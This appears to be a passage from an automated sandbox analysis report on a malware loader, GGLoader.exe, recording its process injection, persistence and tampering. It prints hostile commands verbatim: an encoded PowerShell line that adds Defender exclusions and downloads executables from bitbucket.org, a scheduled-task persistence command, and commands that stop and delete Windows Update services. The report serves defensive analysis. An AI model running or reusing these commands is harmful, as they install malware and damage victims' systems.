                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 87C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17AABF90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1600D650000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 23FD1160000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B9A6A80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 13713CB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 226B1810000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 208F5FC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2505E560000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C51E3F0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C08C180000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A4014E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A401510000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5FC570000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WerFault.exe base: 27CE7AB0000 value starts with: 4D5A
                        Injects code into the Windows Explorer (explorer.exe)
                        Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 87C0000 value: 4D
                        Maps a DLL or memory area into another process
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                        Modifies the context of a thread in another process (thread injection)
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeThread register set: target process: 916Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 8168
                        Modifies the hosts file
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeMemory written: C:\Windows\System32\dialer.exe base: 1002B9010Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 6DFA038010
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BA20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 87C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17AABF90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1600D650000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 23FD1160000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B9A6A80000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 13713CB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 226B1810000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 208F5FC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2505E560000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C51E3F0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C08C180000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A4014E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A401510000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5FC570000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WerFault.exe base: 27CE7AB0000
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>; Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagcacgb4acmapgbtahqayqbyahqalqbqahiabwbjaguacwbzacaacabvahcazqbyahmaaablagwabaagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiaataeeacgbnahuabqblag4adabmagkacwb0acaaigbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajag4adqbzacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccatgbvacaavgbpahiadab1ageabaagae0ayqbjaggaaqbuagualwbtaguacgb2aguacgagagkacwagageababsag8adwblagqaiqagafqacgb5acaacgb1ag4abgbpag4azwagag8abgagageaiabkagkazgbmaguacgblag4adaagagqazqb2agkaywblaceajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajahcaawbracmapga7aciaowa8acmazqbmahiaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbmahaazwajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbuahoaaaajad4aiaataeyabwbyagmazqagadwaiwbhaheazaajad4aowaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavaduaoqa0adaaagbnadkaoaazadqalwbnagyamwa0adqamwbmadmalwbyageadwavadaayqbkagyayqblagyanabmadganaa3ageamqa3aguayqa0aguanabmadyanqa2agqaywbkadganqbladcangayadkamwa3adgamablagqalwbeac4azqb4aguajwasacaapaajahaaagb4acmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmadgbjahkaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmaeqbjahkaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmazqbuahmazqbhaguadaauaguaeablaccakqapadwaiwbiagcaawajad4aowagacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaanaggadab0ahaacwa6ac8alwbiagkadabiahuaywbraguadaauag8acgbnac8acgblagmaaablageadabzag8acgbnac8acgblagmaaablageadabzagqaaqbyaguaywb0ac8acgbhahcalwawadaazqbiadiazaawagianaazadyanqa5adeazgbjaguamqaxaduamwbiageaywbhadcangayaduamaa5aguanwa2adiazgayagmazqa0ac8aqwbmafaalgblahgazqanacwaiaa8acmacwbiagqaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwboaheadqajad4aiaatafaayqb0aggaiaakaguabgb2adoavablag0acaagadwaiwbrahcacwajad4aiaataemaaabpagwazabqageadaboacaajwbmagkaywbdaggazqbjagsalgblahgazqanackakqa8acmaawbpahgaiwa+adsaiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavahiazqbjaggazqbhahqacwbvahiazwavahiazqbjaggazqbhahqacwbkagkacgblagmadaavahiayqb3ac8amaawaguaygayagqamabiadqamwa2aduaoqaxagyaywbladeamqa1admaygbhagmayqa3adyamga1adaaoqbladcangayagyamgbjaguanaavaeqazqb2ag0aaqbuac4azqb4aguajwasacaapaajagqadqbxacmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmaaaboahqaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmadqbzahiaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmauwblag4azaauaguaeablaccakqapadwaiwboahcab
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#nus#>[system.windows.forms.messagebox]::show('no virtual machine/server is allowed! try running on a different device!','','ok','error')<#wkk#>;
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
